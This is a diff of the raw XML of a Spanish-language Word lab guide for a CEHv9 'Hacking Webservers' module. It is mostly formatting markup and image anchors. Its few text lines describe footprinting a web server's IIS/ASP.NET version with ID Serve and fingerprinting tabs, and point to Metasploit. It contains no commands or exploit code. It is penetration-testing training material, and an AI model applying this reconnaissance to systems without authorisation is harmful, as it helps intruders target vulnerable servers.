-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>-</w:t>
-        <w:tab/>
-        <w:t>Cuando los atacantes obtienen esta información, investigan las vulnerabilidades presentes en ASP.NET e IIS versión 6.0 e intentan explotarlas, lo que resulta en un control total o parcial sobre la aplicación web.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>-</w:t>
-        <w:tab/>
-        <w:t>Haga clic en la pestaña GET long request, que enumera todas las solicitudes GET. Luego haga clic en la pestaña Detalles de huella digital.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="17">
-            <wp:simplePos x="0" y="0"/>
-            <wp:positionH relativeFrom="column">
-              <wp:align>center</wp:align>
-            </wp:positionH>
-            <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>635</wp:posOffset>
-            </wp:positionV>
-            <wp:extent cx="5248910" cy="5172710"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="17" name="Image16" descr=""/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="17" name="Image16" descr=""/>
+                    <pic:cNvPr id="17" name="Image15" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
@@ -5909,6 +5215,593 @@
         </w:rPr>
         <w:t>-</w:t>
         <w:tab/>
+        <w:t>Cuando los atacantes obtienen esta información, investigan las vulnerabilidades presentes en ASP.NET e IIS versión 6.0 e intentan explotarlas, lo que resulta en un control total o parcial sobre la aplicación web.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>-</w:t>
+        <w:tab/>
+        <w:t>Haga clic en la pestaña GET long request, que enumera todas las solicitudes GET. Luego haga clic en la pestaña Detalles de huella digital.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="17">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:align>center</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>635</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5248910" cy="5172710"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="18" name="Image16" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="18" name="Image16" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId21"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5248910" cy="5172710"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>-</w:t>
+        <w:tab/>
         <w:t>Los detalles que se muestran en la captura de pantalla anterior incluyen el nombre del protocolo que usa el sitio web y su versión.</w:t>
       </w:r>
     </w:p>
@@ -6186,7 +6079,7 @@
         <w:tab/>
         <w:t xml:space="preserve">Servicio de ID ubicado en D: \ CEH-Tools \ CEHv9 Módulo 11 Hacking Webservers \ Webserver Footprinting Tools \ ID Serve. También puede descargar la última versión de ID Serve desde el enlace </w:t>
       </w:r>
-      <w:hyperlink r:id="rId21">
+      <w:hyperlink r:id="rId22">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="InternetLink"/>
@@ -6431,7 +6324,7 @@
             <wp:extent cx="5725160" cy="4448810"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="18" name="Image17" descr=""/>
+            <wp:docPr id="19" name="Image17" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -6439,13 +6332,13 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="18" name="Image17" descr=""/>
+                    <pic:cNvPr id="19" name="Image17" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId22"/>
+                    <a:blip r:embed="rId23"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -6906,7 +6799,7 @@
         <w:tab/>
         <w:t>En la opción 1, ingrese la URL (</w:t>
       </w:r>
-      <w:hyperlink r:id="rId23">
+      <w:hyperlink r:id="rId24">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="InternetLink"/>
@@ -6951,7 +6844,7 @@
             <wp:extent cx="5706110" cy="4448810"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="19" name="Image18" descr=""/>
+            <wp:docPr id="20" name="Image18" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -6959,13 +6852,13 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="19" name="Image18" descr=""/>
+                    <pic:cNvPr id="20" name="Image18" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId24"/>
+                    <a:blip r:embed="rId25"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -7048,7 +6941,7 @@
             <wp:extent cx="5706110" cy="4429125"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="20" name="Image19" descr=""/>
+            <wp:docPr id="21" name="Image19" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -7056,13 +6949,13 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="20" name="Image19" descr=""/>
+                    <pic:cNvPr id="21" name="Image19" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId25"/>
+                    <a:blip r:embed="rId26"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -7848,7 +7741,7 @@
         <w:tab/>
         <w:t xml:space="preserve">Metasploit, que se encuentra en D: \ CEH-Tools \ CEHv9 Module 11 Hacking WebServer \ Wenserver Attack Tools \ Metasploit Framework. También puede descargar la última versión de Metasploit Framework desde el enlace </w:t>
       </w:r>
-      <w:hyperlink r:id="rId26">
+      <w:hyperlink r:id="rId27">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="InternetLink"/>
@@ -8001,11 +7894,7 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
+        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -8032,17 +7921,127 @@
           <w:b w:val="false"/>
           <w:bCs w:val="false"/>
         </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="44">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>43815</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>40640</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="1953260" cy="1165225"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="22" name="Image42" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="22" name="Image42" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId28"/>
+                    <a:srcRect l="14811" t="27264" r="53270" b="36407"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="1953260" cy="1165225"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
